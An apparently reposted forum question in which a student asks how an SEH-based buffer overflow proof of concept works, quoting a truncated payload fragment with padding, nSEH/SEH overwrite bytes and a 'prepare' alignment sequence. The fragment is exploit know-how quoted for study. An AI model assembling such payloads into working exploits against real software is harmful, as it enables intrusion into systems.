I am trying to understand how a SEH based buffer overflow is working and I have to write a paper about how an exploit works. I took this PoC for my paper.
junk = "\x41" * 4091 nseh = "\x61\x62" seh = "\x57\x42" # Overwrite Seh # 0x00420057 : {pivot 8} prepare = "\x44\x6e\x53\x6e\x58\x6e\x05" prepare += "\x14\x11\x6e\x2d\x13\x11\x6e\x50\x6d\xc3" prepare += "\x41" * 107; ... I don’t really understand how it’s jumping over the next SEH.
- What is
\x61\x62used for in thensehvariable? - What is the prepare variable used for?
- How is it jumping to the shellcode?
I already understand that the \x57\x42 is used as a pointer to target a pop pop ret to trigger a second error but I am stuck after that…
The post What is this “prepare” variable used for in this SEH based buffer overflow payload? appeared first on 100% Private Proxies - Fast, Anonymous, Quality, Unlimited USA Private Proxy!.